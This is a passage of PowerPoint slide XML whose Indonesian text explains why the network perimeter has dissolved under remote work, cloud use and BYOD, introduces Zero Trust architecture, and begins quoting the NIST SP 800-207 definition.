              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perbedaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tenaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perpaduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> outsourcing dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peluang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Staf dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialihdayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikontrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendesain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakomodasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bring Your Own Device (BYOD).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Zero Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Zero Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengasumsikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>begitu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Zero Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>NIST SP 800-207 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Zero Trust" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Zero Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paradigma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
